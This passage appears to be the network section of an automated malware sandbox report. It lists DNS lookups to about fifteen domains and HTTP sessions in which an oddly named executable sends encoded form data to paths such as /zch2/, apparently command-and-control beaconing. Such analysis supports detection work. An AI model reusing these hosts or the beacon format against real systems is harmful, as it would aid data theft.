                                        Aug 27, 2024 08:45:08.777724028 CEST5125280192.168.2.6172.67.220.161
                                        Aug 27, 2024 08:45:08.782236099 CEST8051252172.67.220.161192.168.2.6
                                        Aug 27, 2024 08:45:08.827222109 CEST5125280192.168.2.6172.67.220.161
                                        Aug 27, 2024 08:45:08.919965982 CEST8051252172.67.220.161192.168.2.6
                                        Aug 27, 2024 08:45:08.920003891 CEST8051252172.67.220.161192.168.2.6
                                        Aug 27, 2024 08:45:08.920017958 CEST8051252172.67.220.161192.168.2.6
                                        Aug 27, 2024 08:45:08.920030117 CEST8051252172.67.220.161192.168.2.6
                                        Aug 27, 2024 08:45:08.920042992 CEST8051252172.67.220.161192.168.2.6
                                        Aug 27, 2024 08:45:08.920054913 CEST8051252172.67.220.161192.168.2.6
                                        Aug 27, 2024 08:45:08.920069933 CEST5125280192.168.2.6172.67.220.161
                                        Aug 27, 2024 08:45:08.920069933 CEST5125280192.168.2.6172.67.220.161
                                        Aug 27, 2024 08:45:08.920114994 CEST5125280192.168.2.6172.67.220.161
                                        Aug 27, 2024 08:45:08.920711040 CEST8051252172.67.220.161192.168.2.6
                                        Aug 27, 2024 08:45:08.920722961 CEST8051252172.67.220.161192.168.2.6
                                        Aug 27, 2024 08:45:08.920737028 CEST8051252172.67.220.161192.168.2.6
                                        Aug 27, 2024 08:45:08.920784950 CEST5125280192.168.2.6172.67.220.161
                                        Aug 27, 2024 08:45:08.921474934 CEST8051252172.67.220.161192.168.2.6
                                        Aug 27, 2024 08:45:08.921519995 CEST8051252172.67.220.161192.168.2.6
                                        Aug 27, 2024 08:45:08.921535015 CEST8051252172.67.220.161192.168.2.6
                                        Aug 27, 2024 08:45:08.921572924 CEST5125280192.168.2.6172.67.220.161
                                        Aug 27, 2024 08:45:08.921597958 CEST5125280192.168.2.6172.67.220.161
                                        Aug 27, 2024 08:45:09.027287960 CEST8051252172.67.220.161192.168.2.6
                                        Aug 27, 2024 08:45:09.027304888 CEST8051252172.67.220.161192.168.2.6
                                        Aug 27, 2024 08:45:09.027318954 CEST8051252172.67.220.161192.168.2.6
                                        Aug 27, 2024 08:45:09.027331114 CEST8051252172.67.220.161192.168.2.6
                                        Aug 27, 2024 08:45:09.027343988 CEST8051252172.67.220.161192.168.2.6
                                        Aug 27, 2024 08:45:09.027352095 CEST5125280192.168.2.6172.67.220.161
                                        Aug 27, 2024 08:45:09.027403116 CEST5125280192.168.2.6172.67.220.161
                                        Aug 27, 2024 08:45:09.027643919 CEST8051252172.67.220.161192.168.2.6
                                        Aug 27, 2024 08:45:09.027712107 CEST5125280192.168.2.6172.67.220.161
                                        Aug 27, 2024 08:45:10.108513117 CEST5125280192.168.2.6172.67.220.161

                                        UDP Packets

                                        TimestampSource PortDest PortSource IPDest IP
                                        Aug 27, 2024 08:41:46.318624020 CEST5352253162.159.36.2192.168.2.6
                                        Aug 27, 2024 08:41:46.786346912 CEST53545251.1.1.1192.168.2.6
                                        Aug 27, 2024 08:41:50.713474989 CEST5146253192.168.2.61.1.1.1
                                        Aug 27, 2024 08:41:50.872277021 CEST53514621.1.1.1192.168.2.6
                                        Aug 27, 2024 08:42:07.674534082 CEST6252753192.168.2.61.1.1.1
                                        Aug 27, 2024 08:42:07.712631941 CEST53625271.1.1.1192.168.2.6
                                        Aug 27, 2024 08:42:20.830620050 CEST6069253192.168.2.61.1.1.1
                                        Aug 27, 2024 08:42:20.924633026 CEST53606921.1.1.1192.168.2.6
                                        Aug 27, 2024 08:42:34.284012079 CEST5920553192.168.2.61.1.1.1
                                        Aug 27, 2024 08:42:35.112076044 CEST53592051.1.1.1192.168.2.6
                                        Aug 27, 2024 08:42:48.705311060 CEST5280953192.168.2.61.1.1.1
                                        Aug 27, 2024 08:42:48.806505919 CEST53528091.1.1.1192.168.2.6
                                        Aug 27, 2024 08:43:02.190624952 CEST5487553192.168.2.61.1.1.1
                                        Aug 27, 2024 08:43:02.208856106 CEST53548751.1.1.1192.168.2.6
                                        Aug 27, 2024 08:43:16.253457069 CEST6171953192.168.2.61.1.1.1
                                        Aug 27, 2024 08:43:16.392121077 CEST53617191.1.1.1192.168.2.6
                                        Aug 27, 2024 08:43:29.596369028 CEST5558653192.168.2.61.1.1.1
                                        Aug 27, 2024 08:43:29.869577885 CEST53555861.1.1.1192.168.2.6
                                        Aug 27, 2024 08:43:43.207561970 CEST5739253192.168.2.61.1.1.1
                                        Aug 27, 2024 08:43:43.423295021 CEST53573921.1.1.1192.168.2.6
                                        Aug 27, 2024 08:43:56.815368891 CEST6492253192.168.2.61.1.1.1
                                        Aug 27, 2024 08:43:56.989779949 CEST53649221.1.1.1192.168.2.6
                                        Aug 27, 2024 08:44:10.143544912 CEST6325653192.168.2.61.1.1.1
                                        Aug 27, 2024 08:44:10.197935104 CEST53632561.1.1.1192.168.2.6
                                        Aug 27, 2024 08:44:23.331578016 CEST6025453192.168.2.61.1.1.1
                                        Aug 27, 2024 08:44:23.493814945 CEST53602541.1.1.1192.168.2.6
                                        Aug 27, 2024 08:44:36.628376961 CEST5660753192.168.2.61.1.1.1
                                        Aug 27, 2024 08:44:37.566479921 CEST53566071.1.1.1192.168.2.6
                                        Aug 27, 2024 08:44:51.096506119 CEST5386053192.168.2.61.1.1.1
                                        Aug 27, 2024 08:44:51.575603962 CEST53538601.1.1.1192.168.2.6
                                        Aug 27, 2024 08:45:04.832375050 CEST6382953192.168.2.61.1.1.1
                                        Aug 27, 2024 08:45:04.846611023 CEST53638291.1.1.1192.168.2.6

                                        DNS Queries

                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                        Aug 27, 2024 08:41:50.713474989 CEST192.168.2.61.1.1.10xe8e7Standard query (0)www.gate-eight.netA (IP address)IN (0x0001)false
                                        Aug 27, 2024 08:42:07.674534082 CEST192.168.2.61.1.1.10x3ba5Standard query (0)www.glitterinthegrey.shopA (IP address)IN (0x0001)false
                                        Aug 27, 2024 08:42:20.830620050 CEST192.168.2.61.1.1.10xe989Standard query (0)www.indeks.spaceA (IP address)IN (0x0001)false
                                        Aug 27, 2024 08:42:34.284012079 CEST192.168.2.61.1.1.10x70ddStandard query (0)www.cs0724sd92jj.cloudA (IP address)IN (0x0001)false
                                        Aug 27, 2024 08:42:48.705311060 CEST192.168.2.61.1.1.10xef11Standard query (0)www.kontorpaneli.xyzA (IP address)IN (0x0001)false
                                        Aug 27, 2024 08:43:02.190624952 CEST192.168.2.61.1.1.10xc0eaStandard query (0)www.globyglen.infoA (IP address)IN (0x0001)false
                                        Aug 27, 2024 08:43:16.253457069 CEST192.168.2.61.1.1.10x87aStandard query (0)www.techcables.shopA (IP address)IN (0x0001)false
                                        Aug 27, 2024 08:43:29.596369028 CEST192.168.2.61.1.1.10xb29Standard query (0)www.adindadisini15.clickA (IP address)IN (0x0001)false
                                        Aug 27, 2024 08:43:43.207561970 CEST192.168.2.61.1.1.10x6f41Standard query (0)www.stolex.topA (IP address)IN (0x0001)false
                                        Aug 27, 2024 08:43:56.815368891 CEST192.168.2.61.1.1.10x865fStandard query (0)www.healthsolutions.topA (IP address)IN (0x0001)false
                                        Aug 27, 2024 08:44:10.143544912 CEST192.168.2.61.1.1.10x6e65Standard query (0)www.staffmasters.onlineA (IP address)IN (0x0001)false
                                        Aug 27, 2024 08:44:23.331578016 CEST192.168.2.61.1.1.10xf519Standard query (0)www.personal-loans-jp8.xyzA (IP address)IN (0x0001)false
                                        Aug 27, 2024 08:44:36.628376961 CEST192.168.2.61.1.1.10x24d9Standard query (0)www.kamicare-com.tokyoA (IP address)IN (0x0001)false
                                        Aug 27, 2024 08:44:51.096506119 CEST192.168.2.61.1.1.10xaa10Standard query (0)www.sorriragora.onlineA (IP address)IN (0x0001)false
                                        Aug 27, 2024 08:45:04.832375050 CEST192.168.2.61.1.1.10x43f4Standard query (0)www.cchelvn.shopA (IP address)IN (0x0001)false

                                        DNS Answers

                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                        Aug 27, 2024 08:41:50.872277021 CEST1.1.1.1192.168.2.60xe8e7No error (0)www.gate-eight.netgate-eight.netCNAME (Canonical name)IN (0x0001)false
                                        Aug 27, 2024 08:41:50.872277021 CEST1.1.1.1192.168.2.60xe8e7No error (0)gate-eight.net92.204.210.213A (IP address)IN (0x0001)false
                                        Aug 27, 2024 08:42:07.712631941 CEST1.1.1.1192.168.2.60x3ba5No error (0)www.glitterinthegrey.shopglitterinthegrey.shopCNAME (Canonical name)IN (0x0001)false
                                        Aug 27, 2024 08:42:07.712631941 CEST1.1.1.1192.168.2.60x3ba5No error (0)glitterinthegrey.shop84.32.84.32A (IP address)IN (0x0001)false
                                        Aug 27, 2024 08:42:20.924633026 CEST1.1.1.1192.168.2.60xe989No error (0)www.indeks.space194.58.112.174A (IP address)IN (0x0001)false
                                        Aug 27, 2024 08:42:35.112076044 CEST1.1.1.1192.168.2.60x70ddNo error (0)www.cs0724sd92jj.cloudyuanda.zhongshengxinyun.comCNAME (Canonical name)IN (0x0001)false
                                        Aug 27, 2024 08:42:35.112076044 CEST1.1.1.1192.168.2.60x70ddNo error (0)yuanda.zhongshengxinyun.com119.28.49.194A (IP address)IN (0x0001)false
                                        Aug 27, 2024 08:42:48.806505919 CEST1.1.1.1192.168.2.60xef11No error (0)www.kontorpaneli.xyzredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                                        Aug 27, 2024 08:42:48.806505919 CEST1.1.1.1192.168.2.60xef11No error (0)redirect.natrocdn.comnatroredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                                        Aug 27, 2024 08:42:48.806505919 CEST1.1.1.1192.168.2.60xef11No error (0)natroredirect.natrocdn.com85.159.66.93A (IP address)IN (0x0001)false
                                        Aug 27, 2024 08:43:02.208856106 CEST1.1.1.1192.168.2.60xc0eaNo error (0)www.globyglen.infoglobyglen.infoCNAME (Canonical name)IN (0x0001)false
                                        Aug 27, 2024 08:43:02.208856106 CEST1.1.1.1192.168.2.60xc0eaNo error (0)globyglen.info3.33.130.190A (IP address)IN (0x0001)false
                                        Aug 27, 2024 08:43:02.208856106 CEST1.1.1.1192.168.2.60xc0eaNo error (0)globyglen.info15.197.148.33A (IP address)IN (0x0001)false
                                        Aug 27, 2024 08:43:16.392121077 CEST1.1.1.1192.168.2.60x87aNo error (0)www.techcables.shop194.195.220.41A (IP address)IN (0x0001)false
                                        Aug 27, 2024 08:43:29.869577885 CEST1.1.1.1192.168.2.60xb29No error (0)www.adindadisini15.clickadindadisini15.clickCNAME (Canonical name)IN (0x0001)false
                                        Aug 27, 2024 08:43:29.869577885 CEST1.1.1.1192.168.2.60xb29No error (0)adindadisini15.click172.96.186.147A (IP address)IN (0x0001)false
                                        Aug 27, 2024 08:43:43.423295021 CEST1.1.1.1192.168.2.60x6f41No error (0)www.stolex.top162.0.239.141A (IP address)IN (0x0001)false
                                        Aug 27, 2024 08:43:56.989779949 CEST1.1.1.1192.168.2.60x865fNo error (0)www.healthsolutions.top13.248.169.48A (IP address)IN (0x0001)false
                                        Aug 27, 2024 08:43:56.989779949 CEST1.1.1.1192.168.2.60x865fNo error (0)www.healthsolutions.top76.223.54.146A (IP address)IN (0x0001)false
                                        Aug 27, 2024 08:44:10.197935104 CEST1.1.1.1192.168.2.60x6e65No error (0)www.staffmasters.onlinestaffmasters.onlineCNAME (Canonical name)IN (0x0001)false
                                        Aug 27, 2024 08:44:10.197935104 CEST1.1.1.1192.168.2.60x6e65No error (0)staffmasters.online84.32.84.32A (IP address)IN (0x0001)false
                                        Aug 27, 2024 08:44:23.493814945 CEST1.1.1.1192.168.2.60xf519No error (0)www.personal-loans-jp8.xyz199.59.243.226A (IP address)IN (0x0001)false
                                        Aug 27, 2024 08:44:37.566479921 CEST1.1.1.1192.168.2.60x24d9No error (0)www.kamicare-com.tokyo157.7.44.213A (IP address)IN (0x0001)false
                                        Aug 27, 2024 08:44:51.575603962 CEST1.1.1.1192.168.2.60xaa10No error (0)www.sorriragora.onlinesorriragora.onlineCNAME (Canonical name)IN (0x0001)false
                                        Aug 27, 2024 08:44:51.575603962 CEST1.1.1.1192.168.2.60xaa10No error (0)sorriragora.online162.240.81.18A (IP address)IN (0x0001)false
                                        Aug 27, 2024 08:45:04.846611023 CEST1.1.1.1192.168.2.60x43f4No error (0)www.cchelvn.shop172.67.220.161A (IP address)IN (0x0001)false
                                        Aug 27, 2024 08:45:04.846611023 CEST1.1.1.1192.168.2.60x43f4No error (0)www.cchelvn.shop104.21.62.58A (IP address)IN (0x0001)false

                                        HTTP Request Dependency Graph

                                        • www.gate-eight.net
                                        • www.glitterinthegrey.shop
                                        • www.indeks.space
                                        • www.cs0724sd92jj.cloud
                                        • www.kontorpaneli.xyz
                                        • www.globyglen.info
                                        • www.techcables.shop
                                        • www.adindadisini15.click
                                        • www.stolex.top
                                        • www.healthsolutions.top
                                        • www.staffmasters.online
                                        • www.personal-loans-jp8.xyz
                                        • www.kamicare-com.tokyo
                                        • www.sorriragora.online
                                        • www.cchelvn.shop

                                        HTTP Packets

                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        0192.168.2.65119392.204.210.213805700C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exe
                                        TimestampBytes transferredDirectionData
                                        Aug 27, 2024 08:41:50.896219969 CEST585OUTGET /zbwq/?mvjDMBx8=yiu0kyrMDZDnaGSHUN6l2/AWenBEPojQbvIrsSiIoULw3Ja/Kxh4uhHPf3lVqybB3F8SgOCipbonbrybGxTRaMG4SCnpngzzUdFAxyNhxQ0Fwwko6x3YD+nfuTkI7r5rP6BNPZw=&AT=RrjDj4Z85jYPlHG0 HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                        Accept-Language: en-US,en;q=0.9
                                        Host: www.gate-eight.net
                                        Connection: close
                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1526 Build/LPI23.29-18-S.2; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                        Aug 27, 2024 08:41:52.625930071 CEST1236INHTTP/1.1 200 OK
                                        Date: Tue, 27 Aug 2024 06:41:51 GMT
                                        Server: Apache
                                        X-Powered-By: PHP/7.4.33
                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                        Cache-Control: no-cache, must-revalidate, max-age=0
                                        Retry-After: 86400
                                        Upgrade: h2,h2c
                                        Connection: Upgrade, close
                                        Vary: Accept-Encoding
                                        Transfer-Encoding: chunked
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 62 33 66 0d 0a 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 47 61 74 65 20 38 20 69 73 20 75 6e 64 65 72 20 63 6f 6e 73 74 72 75 63 74 69 6f 6e 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 65 6e 65 72 61 74 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 d8 a7 d9 84 d9 85 d9 84 d8 ad d9 82 20 [TRUNCATED]
                                        Data Ascii: b3f<html lang="en"> <head> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>Gate 8 is under construction</title> <meta name="description" content="" /> <meta name="generator" content=" "> <link rel="stylesheet" href="https://fonts.bunny.net/css?family=Nunito:400,900"> <link rel="stylesheet" href="http://gate-eight.net/wp-content/plugins/under-construction-page/themes/css/bootstrap.min.css?v=4.01" type="text/css"><link rel="stylesheet" href="http://gate-eight.net/wp-content/plugins/under-construction-page/themes/css/common.css?v=4.01" type="text/css"><link rel="stylesheet" href="http://gate-eight.net/wp-content/plugins/under-construction-page/themes/light_bul
                                        Aug 27, 2024 08:41:52.625977993 CEST1236INData Raw: 62 2f 73 74 79 6c 65 2e 63 73 73 3f 76 3d 34 2e 30 31 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 61 74 65 2d 65 69 67 68
                                        Data Ascii: b/style.css?v=4.01" type="text/css"><link rel="stylesheet" href="http://gate-eight.net/wp-content/plugins/under-construction-page/themes/css/font-awesome.min.css?v=4.01" type="text/css"><link rel="icon" href="http://gate-eight.net/wp-content
                                        Aug 27, 2024 08:41:52.626043081 CEST448INData Raw: 61 73 73 3d 22 72 6f 77 22 20 69 64 3d 22 73 6f 63 69 61 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 78 73 2d 31 32 20 63 6f 6c 2d 6d 64 2d 31 32 20 63 6f 6c 2d 6c 67 2d 31 32 22 3e 0d 0a 20 20 20 20 20
                                        Data Ascii: ass="row" id="social"> <div class="col-xs-12 col-md-12 col-lg-12"> </div> </div> </div> <script src="http://gate-eight.net/wp-includes/js/jquery/jquery.min.js"></script> <script type=
                                        Aug 27, 2024 08:41:52.626077890 CEST318INData Raw: 72 65 6d 6f 76 65 43 6c 61 73 73 28 27 66 61 64 65 69 6e 27 29 2e 73 69 62 6c 69 6e 67 73 28 29 2e 63 73 73 28 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 27 61 62 73 6f 6c 75 74 65 27 0d 0a 20 20 20 20 20 20 7d 29 3b 0d 0a
                                        Data Ascii: removeClass('fadein').siblings().css({ position:'absolute' }); $('.fadein').mouseenter(function() { $('.fadein').stop().fadeTo(600, 0); }).mouseleave(function() { $('.fadein').stop().fadeTo


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        1192.168.2.65119584.32.84.32805700C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exe
                                        TimestampBytes transferredDirectionData
                                        Aug 27, 2024 08:42:07.731540918 CEST858OUTPOST /zch2/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                        Accept-Encoding: gzip, deflate
                                        Accept-Language: en-US,en;q=0.9
                                        Host: www.glitterinthegrey.shop
                                        Origin: http://www.glitterinthegrey.shop
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: no-cache
                                        Content-Length: 213
                                        Referer: http://www.glitterinthegrey.shop/zch2/
                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1526 Build/LPI23.29-18-S.2; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                        Data Raw: 6d 76 6a 44 4d 42 78 38 3d 58 47 52 71 65 74 2b 37 4f 2b 51 4c 37 57 37 75 57 75 47 46 71 64 4d 70 45 4d 72 35 43 36 71 4b 55 63 65 57 66 72 77 6c 70 61 79 30 2f 4a 67 65 32 39 4e 6a 35 73 6e 69 65 68 4d 34 47 36 6f 4f 65 6a 69 6f 2b 62 70 4d 50 33 7a 70 6d 56 74 43 5a 49 4d 57 4f 41 46 35 58 59 35 74 64 41 4a 65 33 2f 78 57 30 62 4c 36 63 4a 43 4f 6a 49 51 32 33 77 6f 6f 57 77 4f 43 63 67 74 4c 79 45 48 78 37 5a 61 66 66 4d 59 6e 4a 5a 37 4b 6f 6c 5a 73 30 71 70 30 47 69 54 30 41 31 64 74 69 46 36 57 58 57 4f 75 44 75 34 55 35 43 57 43 53 63 2b 32 6f 4b 61 6c 51 6c 64 43 45 42 61 51 45 74 2f 4e 48 2b 75 52 35 31 6f 71 6c 78 42 72
                                        Data Ascii: mvjDMBx8=XGRqet+7O+QL7W7uWuGFqdMpEMr5C6qKUceWfrwlpay0/Jge29Nj5sniehM4G6oOejio+bpMP3zpmVtCZIMWOAF5XY5tdAJe3/xW0bL6cJCOjIQ23wooWwOCcgtLyEHx7ZaffMYnJZ7KolZs0qp0GiT0A1dtiF6WXWOuDu4U5CWCSc+2oKalQldCEBaQEt/NH+uR51oqlxBr


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        2192.168.2.65119684.32.84.32805700C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exe
                                        TimestampBytes transferredDirectionData
                                        Aug 27, 2024 08:42:10.270353079 CEST882OUTPOST /zch2/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                        Accept-Encoding: gzip, deflate
                                        Accept-Language: en-US,en;q=0.9
                                        Host: www.glitterinthegrey.shop
                                        Origin: http://www.glitterinthegrey.shop
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: no-cache
                                        Content-Length: 237
                                        Referer: http://www.glitterinthegrey.shop/zch2/
                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1526 Build/LPI23.29-18-S.2; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                        Data Raw: 6d 76 6a 44 4d 42 78 38 3d 58 47 52 71 65 74 2b 37 4f 2b 51 4c 34 32 72 75 56 50 47 46 6f 39 4d 71 59 63 72 35 5a 4b 71 4f 55 63 61 57 66 71 6c 69 70 76 61 30 78 4c 6f 65 33 2f 70 6a 30 4d 6e 69 4c 52 4d 39 4d 61 6f 46 65 69 65 57 2b 65 4a 4d 50 33 6e 70 6d 58 31 43 5a 2f 59 52 4f 51 46 37 4f 6f 35 76 41 77 4a 65 33 2f 78 57 30 62 66 51 63 4e 6d 4f 6a 35 67 32 33 55 45 72 66 51 4f 46 62 67 74 4c 35 6b 48 74 37 5a 61 78 66 4e 56 4b 4a 66 2f 4b 6f 6b 70 73 31 34 42 7a 4d 69 54 49 4e 56 64 2f 6c 33 6e 4f 54 48 66 31 41 66 4d 55 67 43 57 68 61 4b 2f 73 30 35 61 47 43 31 39 41 45 44 43 69 45 4e 2f 6e 46 2b 57 52 72 69 6b 4e 71 46 6b 49 54 45 42 66 74 51 4f 44 4f 57 42 68 2b 55 41 52 48 49 75 2f 65 77 3d 3d
                                        Data Ascii: mvjDMBx8=XGRqet+7O+QL42ruVPGFo9MqYcr5ZKqOUcaWfqlipva0xLoe3/pj0MniLRM9MaoFeieW+eJMP3npmX1CZ/YROQF7Oo5vAwJe3/xW0bfQcNmOj5g23UErfQOFbgtL5kHt7ZaxfNVKJf/Kokps14BzMiTINVd/l3nOTHf1AfMUgCWhaK/s05aGC19AEDCiEN/nF+WRrikNqFkITEBftQODOWBh+UARHIu/ew==


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        3192.168.2.65119784.32.84.32805700C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exe
                                        TimestampBytes transferredDirectionData
                                        Aug 27, 2024 08:42:12.815587044 CEST1895OUTPOST /zch2/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                        Accept-Encoding: gzip, deflate
                                        Accept-Language: en-US,en;q=0.9
                                        Host: www.glitterinthegrey.shop
                                        Origin: http://www.glitterinthegrey.shop
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: no-cache
                                        Content-Length: 1249
                                        Referer: http://www.glitterinthegrey.shop/zch2/
                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1526 Build/LPI23.29-18-S.2; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                        Data Raw: 6d 76 6a 44 4d 42 78 38 3d 58 47 52 71 65 74 2b 37 4f 2b 51 4c 34 32 72 75 56 50 47 46 6f 39 4d 71 59 63 72 35 5a 4b 71 4f 55 63 61 57 66 71 6c 69 70 76 43 30 78 34 77 65 33 66 56 6a 37 73 6e 69 58 42 4d 38 4d 61 6f 59 65 69 47 53 2b 65 55 78 50 31 66 70 6e 30 39 43 52 71 30 52 45 51 46 37 47 49 35 75 64 41 49 63 33 2f 68 53 30 62 50 51 63 4e 6d 4f 6a 37 34 32 77 41 6f 72 5a 51 4f 43 63 67 74 66 79 45 48 52 37 5a 7a 4d 66 4e 41 33 49 73 33 4b 6d 6b 35 73 33 4c 70 7a 45 69 54 77 4f 56 63 73 6c 33 72 76 54 48 44 35 41 66 35 78 67 46 57 68 5a 62 53 6e 6d 62 79 67 5a 6b 6c 4d 48 46 57 58 63 35 50 35 4f 38 72 67 72 41 67 72 6c 6d 49 4c 58 41 74 69 67 7a 79 50 43 68 4a 6f 32 51 39 31 46 4a 76 55 45 43 6f 79 59 5a 44 44 77 4b 67 70 35 50 4b 33 34 4c 44 57 46 49 6b 64 74 55 4c 61 75 6e 63 54 38 66 4d 4a 46 72 71 77 65 53 50 6f 48 35 6e 36 41 76 66 66 6f 4f 71 58 64 7a 64 38 2b 39 46 6f 61 38 72 51 61 2b 6f 73 48 4c 5a 67 50 79 75 43 65 6d 6c 32 52 6d 5a 2b 59 31 39 70 78 79 4d 50 5a 53 43 76 33 6b 4f 54 35 [TRUNCATED]
                                        Data Ascii: mvjDMBx8=XGRqet+7O+QL42ruVPGFo9MqYcr5ZKqOUcaWfqlipvC0x4we3fVj7sniXBM8MaoYeiGS+eUxP1fpn09CRq0REQF7GI5udAIc3/hS0bPQcNmOj742wAorZQOCcgtfyEHR7ZzMfNA3Is3Kmk5s3LpzEiTwOVcsl3rvTHD5Af5xgFWhZbSnmbygZklMHFWXc5P5O8rgrAgrlmILXAtigzyPChJo2Q91FJvUECoyYZDDwKgp5PK34LDWFIkdtULauncT8fMJFrqweSPoH5n6AvffoOqXdzd8+9Foa8rQa+osHLZgPyuCeml2RmZ+Y19pxyMPZSCv3kOT5AXaBDixJUnrRW/t03l3sLRlkqy+4u+EF3FuqUbFeeLoUVU8Z+fuplXzKdfHUAyrNbPGPIPJ6uDGlNk+s5Q0X6cZGbmS+jrRTDIIjCN+kp4V8FKw8plSoomEMA24lCBWcu1Ju7isH299GxvQZCNcf8w6sdjHYa3ECDEzpOBsC3Z4uaaelVMLzcL75NL8a/wHfVRsW8jiAsWVQiWTQIu5Fuqi+sK82h3cBtQGRmxy53UwSTWe+BLc9URUY2QISHKPEQMSvkhWxTAXRxHR2oeaJcwxItldjts8S8qqyoB3EiGOg+COjPThDJqRnsBB3bZw0KJlA+TSbNZ8Z6iWnBhwyoZorVy9X+zf5MuvgHnHkiemi/5MibngBWLU3sNN/mt/ia6NFD/+Xq5V0PteI8DWmlJs2e72tNjEvQA55sV6ANoR3AOcdz8TjpKy4eYOm3LhyXP+MhY3usTEGQLSH4/7S6OyDpBzf3mqyCBe6TGZEMiJtiQ1ecUv2nHl6K0ixA+jNSSVIXPM6Ry5ok0fUK440NywF6VDXAVP+1nPnybrbxERnhb/OFJEerGuAf0DOYVPh5ErX5w8/YhU4rFE6Co6iRGXxro+in2LlXkxjgKsI7UVSkgJ6zRlQs6Bp0cdIpKeRgfM9thnl23Q6FTcAg+gBWQvPbc8ISOXSDD [TRUNCATED]


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        4192.168.2.65119884.32.84.32805700C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exe
                                        TimestampBytes transferredDirectionData
                                        Aug 27, 2024 08:42:15.358021975 CEST592OUTGET /zch2/?mvjDMBx8=aE5KdauoI4Y2umflLKCriqVYTdzyJYOxKMaFRYlB9+Sv37Nuz5MD+L3RaAAlRIcvVgOa2tpXA3nWnQsvE78wTxh4OatPeg0Yh8Bm15yxUJXRh7FOvkM1aT2MQQJBhGDX4aCwZoM=&AT=RrjDj4Z85jYPlHG0 HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                        Accept-Language: en-US,en;q=0.9
